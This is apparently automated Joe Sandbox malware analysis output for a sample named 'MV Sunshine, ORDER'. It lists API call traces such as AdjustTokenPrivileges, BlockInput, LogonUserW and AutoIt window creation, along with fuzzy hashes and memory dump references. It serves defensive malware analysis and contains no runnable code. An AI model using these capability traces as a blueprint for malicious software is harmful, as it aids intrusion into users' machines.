                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      • Opcode ID: 7bac932e897286b9aa4ea0ea135a3c916f27c3923348c28c81cdf64e177ba757
                      • Instruction ID: f524e1c74e5d03554b4b58e19a593cec2ab3d4795298ab99a1f389660a48bb3b
                      • Opcode Fuzzy Hash: 7bac932e897286b9aa4ea0ea135a3c916f27c3923348c28c81cdf64e177ba757
                      • Instruction Fuzzy Hash: 241161726106049FD710EF69D845A2AF7E9FF84324F04891EF9AADB391DB34AC01CB81
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009F977D,?,00A0FB84,?), ref: 009EA302
                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009F977D,?,00A0FB84,?), ref: 009EA314
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: 43f54312be4d691adfa5e9e5a0112682554cd33ef5429a1abbb591f3b379c78b
                      • Instruction ID: 8cbf28cea3e2ae78b9a1cac7032e725155d50d8ba28fcd504f9169c714098955
                      • Opcode Fuzzy Hash: 43f54312be4d691adfa5e9e5a0112682554cd33ef5429a1abbb591f3b379c78b
                      • Instruction Fuzzy Hash: F8F0E23110422DEBDB21AFA4CC48FEA736CBF08361F004166B908D6190D630A901CBA1
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8851), ref: 009D8728
                      • CloseHandle.KERNEL32(?,?,009D8851), ref: 009D873A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      • Opcode ID: a120b3874daa18ec23b68821283047ce7b9ba98f6c2747e41c9f08bc83aa0b57
                      • Instruction ID: 2a05beec388fd2103e6180379cd5c7b5405478d86724b1b26b847e2ec2e735fb
                      • Opcode Fuzzy Hash: a120b3874daa18ec23b68821283047ce7b9ba98f6c2747e41c9f08bc83aa0b57
                      • Instruction Fuzzy Hash: 69E0E675010610EFE7352B60EC09E7777EDEF44750B15843DF46680471DB615C91DB50
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,009A8F97,?,?,?,00000001), ref: 009AA39A
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009AA3A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
                      • Instruction ID: 852d44631e73d4298108308c162102ad6177f869357cd873c91dcda56cc03cc3
                      • Opcode Fuzzy Hash: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
                      • Instruction Fuzzy Hash: EBB0923105820CAFCA106BD1EC09B883F68EB45BB2F404020F61D98860CB6254538A92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
                      • Instruction ID: 7ab85ac9a1aea043d1eef3fcd3af40d8ab205bc1708a04a71d76dcd04888fd2b
                      • Opcode Fuzzy Hash: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
                      • Instruction Fuzzy Hash: 98323422D6DF014DD7239674D83237AA26DAFB73D4F15E737E81AB59A6EB28C4830140
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
                      • Instruction ID: 16a151fa4713de5ffad584941deb715f688860786618e745ae6c237ee82781c4
                      • Opcode Fuzzy Hash: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
                      • Instruction Fuzzy Hash: E0B10F20E2AF514DD32396798831336FA5CAFBB2E5F92D71BFC2674D22EB2185834141
                      APIs
                      • __time64.LIBCMT ref: 009E8B25
                        • Part of subcall function 009A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009E91F8,00000000,?,?,?,?,009E93A9,00000000,?), ref: 009A5443
                        • Part of subcall function 009A543A: __aulldiv.LIBCMT ref: 009A5463
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Time$FileSystem__aulldiv__time64
                      • String ID:
                      • API String ID: 2893107130-0
                      • Opcode ID: 52c2545d68c39a00fde8431f491abff7d13bd351fa8cc447798ca79ae8db94e3
                      • Instruction ID: 1d088ac1816767e19779125d0b86e12c8b505167d8c89b2a373b0d14f91386a3
                      • Opcode Fuzzy Hash: 52c2545d68c39a00fde8431f491abff7d13bd351fa8cc447798ca79ae8db94e3
                      • Instruction Fuzzy Hash: 2D21D2766256508BC329CF69D441B52B3E1EBA5321B288E6CD0E9CF2D0CA75BD05CB94
                      APIs
                      • BlockInput.USER32(00000001), ref: 009F4218
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      • Opcode ID: a821bc4535d92d31eb67f72906ac5cb9dcb24e54921dc67195491d957d09ee40
                      • Instruction ID: 69d07090f02499c109e011851cc89b758b6529c3b1e3756946ff407b95b4df16
                      • Opcode Fuzzy Hash: a821bc4535d92d31eb67f72906ac5cb9dcb24e54921dc67195491d957d09ee40
                      • Instruction Fuzzy Hash: 35E01A312402189FCB10EF99D844AAAB7E8AF94760F048426F94AD7352DA71A8418BA0
                      APIs
                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009E4EEC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: mouse_event
                      • String ID:
                      • API String ID: 2434400541-0
                      • Opcode ID: 6f0799d2eab13cdd08a787a44d5bc69b734a71ebf632bf6f3542ce3250a9c563
                      • Instruction ID: 309e2eddb5e260b04dff408bf15c722d1d1510bfac195e87073967bc01459fa3
                      • Opcode Fuzzy Hash: 6f0799d2eab13cdd08a787a44d5bc69b734a71ebf632bf6f3542ce3250a9c563
                      • Instruction Fuzzy Hash: D6D052A81607883AED2A8B239C5FF77020CF300782FD04AAEB102994C2E8D46C52A030
                      APIs
                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009D88D1), ref: 009D8CB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      • Opcode ID: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
                      • Instruction ID: d0fb77535a9992a077eb880b69fa33b4d64eca6e3c0a6bdab008f95fba734f3a
                      • Opcode Fuzzy Hash: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
                      • Instruction Fuzzy Hash: A9D05E3226050EAFEF01CEA4DC01EAF3B69EB04B01F408111FE15D50A1C775D836AB60
                      APIs
                      • GetUserNameW.ADVAPI32(?,?), ref: 009C2242
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: cc484ed5840a711c52cf17b0562cae8194b50a82fa9dbc0f46babd213f9f39b9
                      • Instruction ID: f1d906cd1708ad53e940f6dbc887d6de864e3e391ca274348b91976fa05615dd
                      • Opcode Fuzzy Hash: cc484ed5840a711c52cf17b0562cae8194b50a82fa9dbc0f46babd213f9f39b9
                      • Instruction Fuzzy Hash: 9EC04CF1C0010DDBDB15DF90DA88DEE77BCAB04305F104455A101F2101E7749B458E71
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 009AA36A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
                      • Instruction ID: 1ab9c6ae98f72a329442e2f0cd775c7ebba47b5d486f32042c2139192b5e40ba
                      • Opcode Fuzzy Hash: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
                      • Instruction Fuzzy Hash: 3CA0123000410CABCA001B81EC044447F5CD6002A07004020F40C44421873254124581
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4ec018d918baa029f1486760e42322d41d0d305d3176723065fe4e3669deca5d
                      • Instruction ID: 83caccd8b649f288f01cfe540a09e7e41681840282f77b5a959f4bd6da06a37a
                      • Opcode Fuzzy Hash: 4ec018d918baa029f1486760e42322d41d0d305d3176723065fe4e3669deca5d
                      • Instruction Fuzzy Hash: 10222870505616CBDF288F2CC49467FB7A5EB02340F69886FD8829B691EB39DD81DB60
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction ID: c8fae74df262a7ca6ba8d3427587c727791cc67ff92c2cebec47af428be613ac
                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                      • Instruction Fuzzy Hash: FFC1A3322051A309DF6D873D943403EBAE59EA37B131A1B5EE8B3CB5D4EF20D524E660
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction ID: 25e41e3996f16e8c8fc6663c3f6c45444159b3d375edf0ee99ca20055cfc96a7
                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                      • Instruction Fuzzy Hash: 32C192322051A30ADF6D473E943403EBBE59AA37B131A0B6DE4B2DB5D4EF24D524E660
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction ID: e66f7f1c1b0deebb44abb435379aced5415f6494df42cb7888fec568351431b0
                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction Fuzzy Hash: ABC184322051A30DDF6D463AD43403EBBE99AA37B171A0B6DE4B3CB5D4EF20D524D660
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                      • Instruction ID: 3c3dce90681401a7344bdcd2dae070d2ef00d34ad0738ec3d892d31c9a7e089e
                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                      • Instruction Fuzzy Hash: 5A41D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D734AB41DB40
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                      • Instruction ID: bf0e9af3f21afc9758bcaf224c5ed9ed3a0e371a9c620d849be09957a7626989
                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                      • Instruction Fuzzy Hash: CC018078A10209EFCB44DF98C5909AEF7B6FB48310F208599E909A7705D735AE51DB80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                      • Instruction ID: d2768d98873236260ddf50859e1933e5a5317fb370d0775f74bcaf8013f2e61d
                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                      • Instruction Fuzzy Hash: BB019278A10219EFCB44DF98C5909AEF7F6FB48310F2085D9D809A7705D735AE51DB80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 009F7B70
                      • DeleteObject.GDI32(00000000), ref: 009F7B82
                      • DestroyWindow.USER32 ref: 009F7B90
                      • GetDesktopWindow.USER32 ref: 009F7BAA
                      • GetWindowRect.USER32(00000000), ref: 009F7BB1
                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009F7CF2
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009F7D02
                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7D4A
                      • GetClientRect.USER32(00000000,?), ref: 009F7D56
                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009F7D90
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DB2
                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DC5
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DD0
                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DD9
                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DE8
                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DF1
                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7DF8
                      • GlobalFree.KERNEL32(00000000), ref: 009F7E03
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7E15
                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A12CAC,00000000), ref: 009F7E2B
                      • GlobalFree.KERNEL32(00000000), ref: 009F7E3B
                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009F7E61
                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009F7E80
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7EA2
                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F808F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                      • String ID: $AutoIt v3$DISPLAY$static
                      • API String ID: 2211948467-2373415609
                      • Opcode ID: ba5748cb557e7ab93e2051a9d8e256979fcf96bbb9f79c94d60157534871975b
                      • Instruction ID: a53e4a75db437c152fc70f17d08d395b440fb76e7fa31d51259777d54c71cb2e
                      • Opcode Fuzzy Hash: ba5748cb557e7ab93e2051a9d8e256979fcf96bbb9f79c94d60157534871975b
                      • Instruction Fuzzy Hash: 18027E75900109EFDB14DFA8DC89EBEBBB9FB49310F148558F915AB2A1CB719D02CB60
                      APIs
                      • CharUpperBuffW.USER32(?,?,00A0F910), ref: 00A038AF
                      • IsWindowVisible.USER32(?), ref: 00A038D3
                      Strings
                      Memory Dump Source
